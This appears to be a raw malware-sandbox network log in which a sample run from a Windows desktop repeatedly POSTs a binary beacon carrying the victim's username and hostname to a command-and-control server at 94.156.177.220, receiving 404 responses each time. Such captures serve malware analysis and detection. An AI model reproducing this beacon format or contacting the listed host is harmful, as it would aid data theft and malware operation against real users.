                                  Oct 25, 2024 10:20:49.445259094 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:49.450869083 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:50.444104910 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:50 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  38192.168.2.44977494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:50.627054930 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:50.632515907 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:51.601859093 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  39192.168.2.44977594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:52.023469925 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:52.029076099 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:53.016560078 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:52 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  40192.168.2.44977694.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:53.162477970 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:53.168380022 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:54.132812977 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  41192.168.2.44977794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:54.299670935 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:54.305428028 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:55.278779030 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  42192.168.2.44977994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:55.465573072 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:55.471024036 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:56.431684971 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:56 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  43192.168.2.44978094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:56.588748932 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:56.594180107 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:57.586129904 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  44192.168.2.44978294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:58.009188890 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:58.015959024 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:59.001586914 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  45192.168.2.44979394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:59.149625063 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:59.156243086 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:00.129925013 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:59 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  46192.168.2.44979994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:00.305784941 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:00.311297894 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:01.269588947 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  47192.168.2.44980594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:01.413528919 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:01.419074059 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:02.412559032 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  48192.168.2.44981194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:02.570369959 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:02.575992107 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:03.546508074 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:03 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  49192.168.2.44982294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:04.294879913 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:04.300436974 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:05.289841890 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:05 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  50192.168.2.44982894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:05.445229053 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:05.450685024 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:06.441284895 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  51192.168.2.44983694.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:06.697072029 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:06.702578068 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:07.670655966 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  52192.168.2.44984294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:07.818147898 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:07.823534012 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:08.796101093 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:08 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  53192.168.2.44985194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:08.964874029 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:08.970566034 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:09.927454948 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:09 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  54192.168.2.44985894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:10.205096960 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:10.210496902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:11.186306000 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:11 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  55192.168.2.44986494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:11.341701031 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
